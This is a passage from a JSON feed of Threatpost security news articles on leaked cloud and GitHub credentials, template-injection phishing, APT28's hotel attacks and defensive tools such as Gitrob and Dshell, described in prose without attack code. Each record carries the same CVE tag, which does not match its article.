it can often become insecure \u2013 and get worse at scale, according to Erik Peterson, a cloud technology researcher with Veracode. Peterson, who also refers to himself as a Cloud Security Weapons Manufacturer, described the \u2018Emergent Insecurity\u2019 of the cloud in a talk Wednesday at the Source Conference in Boston.\n\nEarly on in his presentation, Peterson recounted a [Chris Hoff](<https://twitter.com/Beaker>) quote that he claims sums up the concept: \u201cIf your security sucks now, you\u2019ll be pleasantly surprised by the lack of change when you move to cloud.\u201d\n\nIn particular Peterson warned about the dangers associated with API credential exposure, something which could easily lead to apps being rigged to spread malware, cloud infrastructure adapted for use in a Bitcoin mining operation, additional attacks being launched, and the most critical: the downloading of sensitive customer data.\n\n\u201cAPI access is the new equivalent to physical access,\u201d Peterson said, \u201cIf someone compromises your most sensitive API credential, it doesn\u2019t matter.\u201d\n\nAPI keys, which protect cloud metadata \u2013 information that usually includes Amazon Web Services (AWS) access credentials, and startup scripts \u2013 can often be the only thing standing between users and total compromise, he stressed.\n\nPeterson, who\u2019s researched cloud and architect solutions in AWS since 2009, warned that old, vintage software vulnerabilities can easily be leveraged for compromise.\n\nHe\u2019s seen it all: Server-side request forgery vulnerabilities, XML external entity vulnerabilities, command injection vulnerabilities, unintended proxy or intermediary vulnerabilities. Each one can lead to the unintended exposure of metadata, but when they all come together, it can result in a full stack hack, or what Peterson likens to \u201cdeath by 1,000 cuts.\u201d\n\nFor instance, he claims, if an attacker gained access to an API key they could escalate privileges. If they gained access to cloud DNS, it could reveal the private IP of the web server. If an attacker got access to an IP address, they could uncover an app that hasn\u2019t been tested. Once in, it\u2019s possible an attacker could do the worst, Peterson claims, clone the database for quiet extraction.\n\n\u201cLots of people are shuffling cloud data and not thinking of the flaws,\u201d Peterson said, \u201cthey all lead to exposing that user data, all that great info my system needs to startup.\u201d\n\nThere are ways to prevent a full stack hack, mainly through encryption, but common sense doesn\u2019t hurt either.\n\n\u201cNo more checking your API keys into GitHub,\u201d Peterson advised.\n\nAttackers often scour the service looking to exploit vulnerabilities and access cloud metadata API. Storing sensitive information like API keys there can be a quick lesson in futility. That still doesn\u2019t stop users from doing it though; a cursory search on the service for \u201cSECRET_ACCESS_KEY\u201d last year yielded 7,500 placeholder results, Peterson said.\n\nOne developer discovered 140 servers running on his Amazon Web Services account [last year](<https://it.slashdot.org/story/15/01/02/2342228/bots-scanning-github-to-steal-amazon-ec2-keys>) after a bot scanning GitHub sniffed out his Amazon Elastic Compute Cloud (EC2) keys.\n\nDevelopers should get off the old EC2 classic and lockdown their Simple Storage Service (S3) buckets, Peterson said Wednesday. If they aren\u2019t already, developers should log everything, especially API activity, he said, adding that some AWS tools, like [Cloudtrail](<https://aws.amazon.com/cloudtrail/>), which records AWS API calls, and [Netflix\u2019s Security Monkey](<https://threatpost.com/netflix-open-source-security-tools-solve-range-of-challenges/107931/>), which can be used to monitor and analyze AWS configurations, can be invaluable.\n\nInstead of trying to control change, developers should react to change, rethink their threat model and realize that lower priority software vulnerabilities, like SSRF, or XXE, can still be deadly, Peterson said.\n\n\u201cIf you have a key that an app is using ask yourself: What\u2019s the worst thing that could happen if it was compromised?\u201d Peterson asked aloud, \u201cIs there a path that leads to my entire environment getting deleted by some unknown entity?\u201d\n", "cvss3": {}, "published": "2016-05-19T14:20:22", "type": "threatpost", "title": "Protecting Cloud APIs Critical to Mitigating Total Compromise", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-05-19T18:20:22", "id": "THREATPOST:08BA9FD6E2245EA011F6C29F24929679", "href": "https://threatpost.com/protecting-cloud-apis-critical-to-mitigating-total-compromise/118197/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:53:25", "description": "Days after news broke last week that advanced, persistent threat actors penetrated nuclear facilities, researchers are explaining techniques used by adversaries to gain toeholds in similar targets in energy. Cisco Talos reported Friday that email-based attacks, leveraging template injection techniques, targeting nuclear facilities and others have been ongoing since May.\n\n\u201cTalos has observed attackers targeting critical infrastructure and energy companies around the world, primarily in Europe and the United States. These attacks target both the critical infrastructure providers, and the vendors those providers used to deliver critical services,\u201d [researchers wrote on Friday](<http://blog.talosintelligence.com/2017/07/template-injection.html#more>).\n\nAdversaries are leveraging classic Word document-based phishing attacks, they said. However, the Word document attachments used in the phishing campaigns do not contain malicious VBA macros or embedded scripting. Instead, attachments attempt to download a malicious template file over a Server Message Block (SMB) connection so that the user\u2019s credentials can be harvested, researchers said.\n\nCisco Talos did not claim this specific attack was used against Wolf Creek Nuclear Operating Corporation or in connection with any specific attack cited in a joint report issued by the Department of Homeland Security and the Federal Bureau of Investigation last week. Neither did researchers claim attacks had ever led to a hacker breaching or disrupting the core systems controlling operations at an energy plant.\n\n\u201cOne objective of this most recent attack appears to be to harvest credentials of users who work within critical infrastructure and manufacturing industries,\u201d Talos wrote.\n\nTargeted phishing attacks included DOCX type documents delivered as attachments under the guise of being an environmental report or a resume. While no malicious macros or scripting is embedded in the document, when a user opens it, a request is made via the SMB protocol for a template, as such \u201cContacting:\\\\\\ . . . \\Template.dotm.\u201d\n\n\u201cThe document was trying to pull down a template file from a particular IP,\u201d they noted. That connection was not via TCP 80 (often used for C2 communications), rather the SMB request was via TCP 445, a traditional Microsoft networking port.\n\nWithin the sandboxed VM \u201ca WebDAV connection was attempted over a SMB session when requesting the template.\u201d\n\nWebDAV is a Web-based Distributed Authoring and Versioning extension to the HTTP protocol that allows users to collaboratively edit and manage files on a remote server, according to [WebDAV Working Group](<http://www.webdav.org/>).\n\nUsing the WebDAV connection, the DOCX file requests a specific Relationship ID that is present in word/_rels/settings.xml.rels, or the XML instructions. According to researchers, the Relationship ID is identical to a phishing tool named Phishery, which uses the exact same ID in its template injection.\n\nPhishery is known as a credential harvester with a Word document template URL injector. According the [GitHub tool description](<https://github.com/ryhanson/phishery>), \u201cPhishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via Basic Authentication.\u201d Once the target opens the Word document attachment sent in the phishing email, the template request reaches out to a Phishery server that triggers a dialogue box on the victim\u2019s computer requesting a Windows username and password.\n\nTalos researchers said Phishery was not used in the attacks it observed. It theorizes attacks may have used modified Phishery code or used the same Relationship ID to thwart analysis.\n\nIn the sample Talos examined, unlike with Phishery that prompted users for credentials, instead a template file is requested from a third-party server with no Basic Authentication prompt for credentials. \u201cSuch a prompt was not needed nor seen for samples requesting the template over SMB,\u201d they wrote.\n\nOnce the target opens the Word document a template request is made to a third-party server that initiates the download of a potentially rogue template. \u201cThe attachment instead tries to download a template file over an SMB connection so that the user\u2019s credentials can be silently harvested. In addition, this template file could also potentially be used to download other malicious payloads to the victim\u2019s computer,\u201d researchers said.\n\nTalos explains that the attacker\u2019s SMB server was down when it analyzed samples, making it impossible to determine the payloads (if any) that could have been dropped by the template being downloaded. \u201cForcing SMB requests to an external server has been a known security vulnerability for many years. Without further information it is impossible to conclude what the true scope of this attack was or what malicious payloads could have been involved.\u201d\n\nAccording to a _[New York Times](<https://www.nytimes.com/2017/07/06/technology/nuclear-plant-hack-report.html>)_ report of attacks against Wolf Creek Nuclear Operating Corporation included phishing lures with highly targeted email messages containing fake resumes for control engineering jobs.\n\nLate last month, the U.S. government warned critical infrastructure companies of hacking campaigns against nuclear and energy sector. \u201cHistorically, cyber actors have strategically targeted the energy sector with various goals ranging from cyber espionage to the ability to disrupt energy systems in the event of a hostile conflict,\u201d the report said.\n", "cvss3": {}, "published": "2017-07-10T14:34:03", "type": "threatpost", "title": "Energy, Nuclear Targeted with Template Injection Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2017-07-10T18:34:03", "id": "THREATPOST:6495B216452F8FF8CDF9A8F13AD41168", "href": "https://threatpost.com/energy-nuclear-targeted-with-template-injection-attacks/126727/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:59:06", "description": "Amazon Web Services is actively searching a number of sources, including code repositories and application stores, looking for exposed credentials that could put users\u2019 accounts and services at risk.\n\nA week ago, a security consultant in Australia said that as many as 10,000 secret Amazon Web Services keys could be found on Github through a simple search. And yesterday, a software developer reported receiving a notice from Amazon that his credentials were discovered on Google Play in an Android application he had built.\n\nRaj Bala printed a [copy of the notice](<http://blog.rajbala.com/post/81038397871/amazon-is-downloading-apps-from-google-play-and>) he received from Amazon pointing out that the app was not built in line with Amazon\u2019s recommended best practices because he had embedded his AWS Key ID (AKID) and AWS Secret Key in the app.\n\n\u201cThis exposure of your AWS credentials within a publicly available Android application could lead to unauthorized use of AWS services, associated excessive charges for your AWS account, and potentially unauthorized access to your data or the data of your application\u2019s users,\u201d Amazon told Baj.\n\nAmazon advises users who have inadvertently exposed their credentials to invalidate them and never distribute long-term AWS keys with an app. Instead, Amazon recommends requesting temporary security credentials.\n\nRich Mogull, founder of consultancy Securosis, said this is a big deal.\n\n\u201cAmazon is being proactive and scanning common sources of account credentials, and then notifying customers,\u201d Mogull said. \u201cThey don\u2019t have to do this, especially since it potentially reduces their income.\u201d\n\nMogull knows of what he speaks. Not long ago, he received a similar notice from Amazon regarding his AWS account, only his warning was a bit more dire\u2014his credentials had been exposed on Gitbub and someone had fired up unauthorized EC2 instances in his account.\n\nMogull wrote an [extensive description of the incident](<https://securosis.com/blog/my-500-cloud-security-screwup>) on the Securosis blog explaining how he was building a proof-of-concept for a conference presentation, storing it on Github, and was done in because a test file he was using against blocks of code contained his Access Key and Secret Key in a comment line.\n\nTurns out someone was using the additional 10 EC2 instances to do some Bitcoin mining and the incident cost Mogull $500 in accumulated charges.\n\nAmazon told an Australian publication that it will continue its efforts to seek out these exposed credentials on third-party sites such as Google Play and Github.\n\n\u201cTo help protect our customers, we operate continuous fraud monitoring processes and alert customers if we find unusual activity,\u201d _[iTnews](<http://www.itnews.com.au/News/381432,aws-admits-scanning-android-app-in-secret-key-hunt.aspx>) _quoted Amazon.\n\nSaid Mogull: \u201cIt isn\u2019t often we see a service provider protecting their customers from error by extending security beyond the provider\u2019s service itself. Very cool.\u201d\n", "cvss3": {}, "published": "2014-04-02T15:01:53", "type": "threatpost", "title": "Amazon Web Services Combing Third Parties for Credentials", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2014-04-04T19:14:11", "id": "THREATPOST:3DB647F38E79C8BDF5846F520D041C7C", "href": "https://threatpost.com/amazon-web-services-combing-third-parties-for-exposed-credentials/105217/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:55:11", "description": "Github is forcing a password reset on some of its users after it detected a number of successful intrusions into its repositories using credentials compromised in other breaches.\n\n\u201cThis appears to be the result of an attacker using lists of email addresses and passwords from other online services that have been compromised in the past, and trying them on GitHub accounts,\u201d GitHub said in an [advisory](<https://github.com/blog/2190-github-security-update-reused-password-attack>) published Thursday by Shawn Davenport, GitHub VP of security. \u201cWe immediately began investigating, and found that the attacker had been able to log in to a number of GitHub accounts.\u201d\n\nGitHub said it detected late Tuesday unauthorized attempts against a large number of GitHub accounts. It stressed that GitHub itself has not been compromised.\n\nIt warns users that in addition to the exposed credentials, some personal information may have been exposed as well as lists of accessible repositories and organizations.\n\n\u201cIf your account was impacted, we are in the process of contacting you directly with information about how to reset your password and restore access to your account,\u201d GitHub said.\n\nThe source of credentials used to attack GitHub accounts is unknown. ~~A request for comment from GitHub was not returned in time for publication~~ Github declined to comment beyond what is in its advisory.\n\nIn recent weeks, a number of massive online services including Twitter, VerticalScope, LinkedIn, Tumblr, VK.com and others have been informed that login credentials are for sale in bulk on the black market.\n\nAggregator site LeakedSource has been selling access to its database of breached credentials and more than 700 million credentials have been shared with the site.\n\n\u201cOur intentions are to bring data breaches to light no matter how old, inform consumers about what data is out there, inform consumers to use unique passwords and through our business API directly help companies determine if their users are at risk for account hijacking,\u201d LeakedSource told Threatpost.\n\n[VerticalScope](<http://www.verticalscope.com/about-us/security-update.html>), whose technology powers a number of popular online forums, is the most recent victim to come to light. More than 40 million credentials are believe to be implicated, stolen from sites running outdate vBulletin software that fails to implement HTTPS.\n\n\u201cWe believe that any potential breach is limited to usernames, userids, email addresses, ip addresses and encrypted passwords of our community users,\u201d VerticalScope said in its advisory.\n\nThe VerticalScope data was shared with LeakedSource, which analyzed it and said most of the passwords were salted using the outdated MD5 algorithm and easily crackable. LeakedSource published a top 10 list of the most common passwords and an unusual number of jibberish, complex passwords were included (18atcskd2w was used more on more than 91,000 accounts) indicating that they were likely generated by a bot and used to access the various forums.\n\nIn addition to VerticalScope, LeakedSource has analyzed tens of millions of credentials belonging to Twitter, iMesh and users of other large services whose credentials were stolen at some point.\n\nExperts, meanwhile, continue to caution against [password reuse](<https://threatpost.com/no-simple-fix-for-password-reuse/118536/>). As these breaches show, using the same password to access multiple sites is becoming fodder for attackers compromising one site to use that same access at other locations on the Internet.\n\n\u201cWe know that attackers will go for the weakest link and that is any user who reuses their passwords. It\u2019s a major problem,\u201d said Christopher Hadnagy, chief human hacker at security firm Social-Engineer.\n", "cvss3": {}, "published": "2016-06-17T11:01:55", "type": "threatpost", "title": "Breached Credentials Used to Access Github Repositories", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-06-28T13:58:36", "id": "THREATPOST:375A1BFC29F5B279C4D5E461D79CE4AA", "href": "https://threatpost.com/breached-credentials-used-to-access-github-repositories/118746/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:56:47", "description": "An audit of the SSH keys associated with more than a million GitHub accounts shows that some users have weak, easily factorable keys and many more are using keys that are still vulnerable to the Debian OpenSSL bug disclosed seven years ago.\n\nThe public SSH keys that users associate with their GitHub account are visible to other users, a feature that enables users to share those keys with others. Last December researcher Ben Cox decided to collect as many of those keys as he could and see what he could find out about them. He began the project on Dec. 27 and by Jan. 9 he had collected more than 1.3 million SSH keys.\n\n\u201cI took a stab at this in 2013 but found that too many people didn\u2019t use GitHub in SSH mode and thus had no keys set. This time however (with a new program that used the events api) I found that the majority of active users had some SSH keys in there,\u201d Cox said in a blog [post](<https://blog.benjojo.co.uk/post/auditing-github-users-keys>) detailing the project.\n\nAfter collecting the keys, Cox began analyzing them. One of the things he looked at was the strength of the key, and he discovered that seven of the keys in his set were just 512 bits, and two others were 256 bits. Those key lengths are short enough to be in the range of factorization on many modern machines.\n\n\u201c512 bit keys have been known to be factorable in less than 3 days. The main example of this is the Texas Instruments calculator firmware signing key that was broken, allowing the modding community to upload any firmware that they wanted,\u201d Cox said.\n\n\u201cI tried on my own to make a 256 bit key and factor it, and the process took less than 25 minutes from having the public SSH key to the factoring of primes (on a subpar processer by today\u2019s standards, and then a few more minutes to transform those back into a SSH key that I could log into systems with. This risk isn\u2019t only real if someone had gathered together top of the line mathematicians or supercomputers worth of power, the 256 bit key I factored was factored on a i5-2400 in 25 mins.\u201d\n\nThe bigger issue, however, is that Cox found what he calls a \u201cvery large amount\u201d of SSH keys in the set that were vulnerable to the [Debian OpenSSL bug](<https://lists.debian.org/debian-security-announce/2008/msg00152.html>) from 2008. That vulnerability existed in certain versions of Debian and resulted from the fact that the OpenSSL random number generator included in those versions was predictable. That means that cryptographic keys generated with vulnerable versions could be guessable. The bug affected SSH keys, VPN keys, and DNSSEC keys, among others.\n\nCox compared the list of keys he had gleaned from GitHub to a list of keys affected by the Debian flaw and found that some of the accounts using vulnerable keys had access to some large and sensitive GitHub repositories. Some of those repositories include Yandex, the Russian search provider, Spotify, the cryptographic libraries for Python, and Python\u2019s core.\n\nCox disclosed the problem to GitHub in early March and the vulnerable keys were revoked on May 5. The other weak and low-quality keys he discovered were revoked on June 1.\n", "cvss3": {}, "published": "2015-06-03T07:37:04", "type": "threatpost", "title": "Audit of GitHub SSH Keys Finds Many Still Vulnerable to Old Debian Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2015-06-04T15:34:07", "id": "THREATPOST:9F1389C4D97BAD7FDE2519A42E4594E2", "href": "https://threatpost.com/audit-of-github-ssh-keys-finds-many-still-vulnerable-to-old-debian-bug/113117/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:59:23", "description": "A Russian security researcher was able to take five low severity OAuth bugs in the coding site Github and string them together to create what he calls a \u201csimple but high severity exploit\u201d that gave him unfettered access to users\u2019 private repositories.\n\nBangkok-based researcher Egor Homakov \u2013 inspired to poke around the site after learning about its [new bug bounty program last month](<http://threatpost.com/github-launches-bug-bounty-program/103974>) \u2013 discussed the bugs in a blog entry [on his site](<http://homakov.blogspot.com/2014/02/how-i-hacked-github-again.html?m=1>) on Friday.\n\nGithub went on to fix the vulnerabilities \u201cin a timely fashion\u201d according to Homakov, who said he received a $4,000 reward, the highest Github has rewarded in the bounty program\u2019s short time, for his work.\n\nThe main problem lies in the site\u2019s Gist OAuth functionality. [Gists](<https://gist.github.com/>) are Pastebin-like repositories on Github that allow coders to share bits and pieces of their work with their contemporaries, and OAuth is an authentication protocol that can allow different entities, be it a web app or a mobile app, varying degrees of access to your account.\n\nThe first vulnerability in Github Homakov noticed was that he could bypass its [redirect_uri](<https://developer.github.com/v3/oauth/#redirect-urls>) validation by imputing a /../ path traversal. A path traversal attack allows access files and directories stored outside the web root folder to be accessed by manipulating the URL. In this case when the browser is redirected, Homakov found that he can control the HTTP parameter and trick it into not fully parsing the URL, letting him redirect to any Gist page he wants.\n\nIn fact Homakov found that whatever the client sent to get an authorization token, the provider would respond with a valid access_token, a vulnerability that could be used to compromise the log-in functionality on any site that uses it.\n\nThis \u2013 the second bug \u2013 could make it easy for an attacker to hijack the authorization code used for the redirect_uri and simply apply the leaked code on real client\u2019s callback to log in under the victim\u2019s account.\n\nHomakov discovered he could leverage both bugs to trick a user into following a link to get Github to leak a code sending request to him. Using something he\u2019s nicknamed an [Evolution of Open Redirect vulnerability](<http://homakov.blogspot.com/2014/01/evolution-of-open-redirect-vulnerability.html>) the code sending request is sent to an image request which Homakov can then use to then log into the victim\u2019s account and secure access to private gists.\n\nGists are static pages and can even allow users to embed their own images, or at least image code. In this situation there\u2019s a certain way the code can point to a suspicious URL and acquire the victim\u2019s code.\n\nOnce in, Homakov found that the client reveals the victim\u2019s actual OAuth access_token to the user agent, something he then was able to take advantage of and use to perform API calls on behalf of the victim.\n\nSince Gist falls under the Github umbrella, Homakov found the client approves any scope it\u2019s asked automatically. That includes allowing it to carry out specially crafted URLs that can leak code, giving him access to private GitHub repositories and Gists, \u201call in stealth-mode,\u201d because the github_token belongs to the Gist client. From here Homakov has the control of the affected Github user and their Gist account.\n\nHomakov is no stranger to rooting out Github bugs; he blogged about a bug involving the way the site pushes [public keys](<http://homakov.blogspot.com/2012/03/how-to.html>) in March 2012 and a problem with the way the site [handles cookies](<http://homakov.blogspot.com/2013/03/hacking-github-with-webkit.html>) last March.\n\nGithub kicked off its bug bounty program just over a week ago by promising to award anywhere from $100 to $5,000 to researchers who discover vulnerabilities in the site or other applications like its API or Gist. As Homakov\u2019s vulnerability involved both Github and Gist and fetched $4,000, it was clearly of concern to the site, with the way the vulnerabilities \u201c[fit so nicely together](<https://twitter.com/homakov/status/431685133570031617>),\u201d impressing Github.\n", "cvss3": {}, "published": "2014-02-11T10:53:58", "type": "threatpost", "title": "Five OAuth Bugs Lead to Github Hack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2014-02-13T22:01:16", "id": "THREATPOST:1F0994F898084346360FB7C6EFEC201C", "href": "https://threatpost.com/five-oauth-bugs-lead-to-github-hack/104178/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:57:34", "description": "Free online code repositories such as GitHub provide a valuable collaboration service for enterprise developers. But it\u2019s also a trove of potentially sensitive company and project information that\u2019s likely to warrant attention from hackers.\n\nAn application security specialist from Berlin has developed a tool he hopes can keep companies a step ahead. [Gitrob](<http://michenriksen.com/blog/gitrob-putting-the-open-source-in-osint/>) is an open source intelligence command-line tool that mines GitHub for files belonging to an organization and runs them against pre-determined patterns looking for potentially sensitive information that isn\u2019t meant for public consumption.\n\nIts developer Michael Henriksen, who does application security and code auditing for SoundCloud, says Gitrob starts off by using GitHub\u2019s public API to query a Github organization\u2019s list of public members.\n\n\u201cWhen the list of members is obtained, it queries GitHub again for each member that returns a list of their public repositories,\u201d Henriksen told Threatopst. \u201cThe contents of the repositories are never downloaded to the machine, it simply uses GitHub\u2019s API again to obtain a list of file names. When clicking on a file in the web interface to see its contents, it is fetched from GitHub\u2019s servers.\u201d\n\nHenriksen said he has built a number of Observers, which act as Gitrob plug-ins, that flag files matching certain patterns. Organization members, repositories and files are saved to a PostgreSQL database for analysis before a Sinatra webserver is started locally in order to serve a web app that presents the data for analysis, which must be conducted manually.\n\n\u201cAll the files are sent through these observers, one by one, and the observers can then decorate or make changes to the file\u2019s database record, before it is saved to the database,\u201d Henriksen said. \u201cRight now, Gitrob actually only contains one observer which will flag files that match [patterns of interesting files](<https://github.com/michenriksen/gitrob/blob/master/patterns.json>), but the design makes it easy to introduce new logic to look for other things. The patterns are built in to the tool itself.\u201d\n\nSecurity analysts inside an enterprise should feel at home using Gitrob, Henriksen said, but cautioned that the tool will point out a default set of potentially sensitive items. An analyst would have to manually comb through them to determine whether those files should be public.\n\n> OSINT #Gitrob mines GitHub for sensitive information that isn\u2019t meant for public consumption.\n> \n> [Tweet](<https://twitter.com/share?url=https%3A%2F%2Fthreatpost.com%2Fgitrob-combs-github-repositories-for-secret-company-data%2F110380%2F&text=OSINT+%23Gitrob+mines+GitHub+for+sensitive+information+that+isn%26%238217%3Bt+meant+for+public+consumption.>)\n\n\u201cA security team in an organization can use Gitrob to periodically scan their repositories for sensitive files that might be checked in,\u201d Henriksen said. \u201cThe current version is not really suitable to run in an automated fashion, so it would have to be run manually, but I am planning to change that in the future so that it can be run automatically and report to somewhere when new things are found.\u201d\n\nHenriksen said he tested Gitrob against a number of GitHub repositories belonging to companies of different sizes; he found a variety of information using Gitrob from username-password combinations, email addresses, internal system mappings and other information that could be used in phishing campaigns or other social engineering attacks. Henriksen said he notified affected organizations; most were appreciative he said.\n\n\u201cI am not aware of any tool that specifically targets GitHub organizations like Gitrob does,\u201d Henriksen said. \u201cPeople have been finding sensitive files with GitHub\u2019s search functionality for a while (kind of like Google dorks for Github), but I think Gitrob is the first tool that makes the task of finding sensitive files within an organization very easy.\u201d\n\nInstallation instructions and requirements can be found on [his Github page](<http://michenriksen.com/blog/gitrob-putting-the-open-source-in-osint/>).\n\n[_Image courtesy othree._](<https://www.flickr.com/photos/othree/>)\n", "cvss3": {}, "published": "2015-01-13T12:55:07", "type": "threatpost", "title": "Gitrob Combs Github Repositories for Secret Company Data", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2015-01-16T13:26:31", "id": "THREATPOST:BFFC84BE9B4393A9F11FFBECEC203286", "href": "https://threatpost.com/gitrob-combs-github-repositories-for-secret-company-data/110380/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:53:16", "description": "Russian-speaking cyberespionage group APT28, also known as Sofacy, is believed to be behind a series of attacks last month against travelers staying in hotels in Europe and the Middle East. APT28 notably used the NSA hacking tool EternalBlue as part of its scheme to steal credentials from business travelers, according to a [report](<https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html>) released Friday by security firm FireEye.\n\nOne of the goals of the attack is to trick guests to download a malicious document masquerading as a hotel reservation form that, if opened and macros are enabled, installs a dropper file that ultimately downloads malware called Gamefish. Gamefish establishes a foothold in targeted systems as a way to install the open source tool called Responder, according to FireEye.\n\n\u201cOnce inside the network of a hospitality company, APT28 sought out machines that controlled both guest and internal Wi-Fi networks,\u201d wrote authors of the report Lindsay Smith and Benjamin Read, both researchers with FireEye\u2019s cyber espionage team.\n\n\u201cTo spread through the hospitality company\u2019s network, APT28 used a version of the EternalBlue SMB exploit. This was combined with the heavy use of py2exe to compile Python scripts. This is the first time we have seen APT28 incorporate this exploit into their intrusions,\u201d researchers said.\n\nFireEye said APT28\u2019s objective was to steal credentials from business travelers using hotel Wi-Fi networks, which the researchers said they did not observe. FireEye does cite a 2016 hotel attack by APT28 with a similar modus operandi. In that incident, a hotel guest\u2019s username and password were stolen while they used the Wi-Fi network. Within 12 hours the victim\u2019s business network was compromised by someone using their credentials.\n\nOnce the foothold is established in the hotel\u2019s wi-fi system, hackers deployed the Responder tool in order to facilitate NetBIOS Name Service (NBT-NS) poisoning. \u201cThis technique listens for NBT-NS (UDP/137) broadcasts from victim computers attempting to connect to network resources. Once received, Responder masquerades as the sought-out resource and causes the victim computer to send the username and hashed password to the attacker-controlled machine,\u201d researchers said.\n\nThat username and hashed password from hotel guests is cracked offline and later used to escalate privileges in the victim\u2019s network, according to FireEye.\n\nIn all, hotels in seven European countries and one Middle Eastern country were targeted. \u201cBusiness and government personnel who are traveling, especially in a foreign country, often rely on systems to conduct business other than those at their home office, and may be unfamiliar with threats posed while abroad,\u201d researchers wrote.\n\nAPT28, or Sofacy, is the group implicated by a December [DHS report](<https://threatpost.com/fbi-dhs-report-links-fancy-bear-to-election-hacks/122802/>) related to U.S. election hacks. In a report [released earlier this week](<https://threatpost.com/updates-to-sofacy-turla-highlight-2017-q2-apt-activity/127297/>), Kaspersky Lab said the group has adopted new macro techniques and continued to find new targets such as the French political party.\n\n\u201cThese incidents show a novel infection vector being used by APT28. The group is leveraging less secure hotel Wi-Fi networks to steal credentials and a NetBIOS Name Service poisoning utility to escalate privileges,\u201d FireEye wrote. \u201cPublicly accessible Wi-Fi networks present a significant threat and should be avoided whenever possible.\u201d\n", "cvss3": {}, "published": "2017-08-12T08:00:32", "type": "threatpost", "title": "APT28 Using EternalBlue to Attack Hotels in Europe, Middle East", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2017-08-12T11:12:17", "id": "THREATPOST:31661FC1D8CDC4988A6B8EB802933A7B", "href": "https://threatpost.com/apt28-using-eternalblue-to-attack-hotels-in-europe-middle-east/127419/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:57:28", "description": "The U.S. Army has released to open source an internal forensics analysis framework that the Army Research Lab has been using for some time.\n\nThe framework, known as Dshell, is a Python tool that runs on Linux and its designed to help analysts investigate compromises within their environments. The goal in open sourcing the framework is to encourage outside developers and analysts to develop and contribute their own modules, based on their experiences.\n\n\u201cOutside of government there are a wide variety of cyber threats that are similar to what we face here at ARL,\u201d William Glodek, Network Security branch chief at the Army Research Laboratory, said in a [statement](<http://www.army.mil/article/141734>).\n\n\u201cDshell can help facilitate the transition of knowledge and understanding to our partners in academia and industry who face the same problems.\u201d\n\nThe Dshell framework is available on [GitHub](<https://github.com/USArmyResearchLab/Dshell>), and Glodek said in his statement that he hopes that users in private industry and the academic community will find the framework useful and be able to contribute their own modules and help expand the framework\u2019s functionality.\n\n\u201cThe success of Dshell so far has been dependent on a limited group of motivated individuals within government. By next year it should be representative of a much larger group with much more diverse backgrounds to analyze cyber attacks that are common to us all,\u201d Glodek said.\n\nThe release of Dshell comes shortly after [Cisco released its own OpenSOC security analytics framework](<https://threatpost.com/cisco-releases-security-analytics-framework-to-open-source/109415>) on [GitHub](<https://opensoc.github.io/>) in November. That framework is designed specifically for large network environments and provides some anomaly detection and incident forensics capabilities.\n\n\u201cOpenSOC is a Big Data security analytics framework designed to consume and monitor network traffic and machine exhaust data of a data center. OpenSOC is extensible and is designed to work at a massive scale,\u201d the OpenSOC documentation says.\n", "cvss3": {}, "published": "2015-01-30T10:59:44", "type": "threatpost", "title": "Army Research Lab Releases Dshell Forensics Framework", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2015-02-03T21:08:15", "id": "THREATPOST:76BC692CF25A0009598D6BE4E626ABD9", "href": "https://threatpost.com/army-research-lab-releases-dshell-forensics-framework/110766/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:55:10", "description": "Mike Mimoso and Chris Brook discuss the news of the week, including a password issue at Github, the xDedic marketplace, another Flash zero day, and how the poorly the FBI is doing with facial recognition software.\n\nDownload: [Threatpost_News_Wrap_June_17_2016.mp3](<http://traffic.libsyn.com/digitalunderground/Threatpost_News_Wrap_June_17_2016.mp3>)\n\nMusic by Chris Gonsalves\n\n[](<https://itunes.apple.com/us/podcast/digital-underground-podcast/id315355232?mt=2>)\n", "cvss3": {}, "published": "2016-06-17T11:15:12", "type": "threatpost", "title": "On xDedic, a Flash Zero Day, Facial Recognition, and More", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-06-28T13:58:31", "id": "THREATPOST:962241D6EFDC7F82640BA9171D82D0B7", "href": "https://threatpost.com/threatpost-news-wrap-june-17-2016/118745/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:57:28", "description": "Almost a year to the day since [Github announced its bug bounty program](<http://threatpost.com/github-launches-bug-bounty-program/103974>), the Git repository said yesterday that it will double its maximum payout to $10,000.\n\nBen Toews, a GitHub staffer, said yesterday that since the launch of the GitHub Security Bug Bounty, 73 previously unknown vulnerabilities have been patched.\n\n\u201cOf 1,920 submissions in the past year, 869 warranted further review, helping us to identify and fix vulnerabilities fitting nine of the OWASP top 10 vulnerability classifications,\u201d Toews said in a post to the GitHub blog. He added that GitHub has paid out $50,100 in bounties to 33 different researchers reporting 57 medium- to high-risk security issues.\n\n\u201cWe saw some incredibly involved and creative vulnerabilities reported,\u201d Toews said.\n\nGitHub pays bounties for verifiable bugs in the GitHub API, GitHub Gist, and the GitHub.com website. Until yesterday, rewards ranged from $100 to $5,000 in each [open 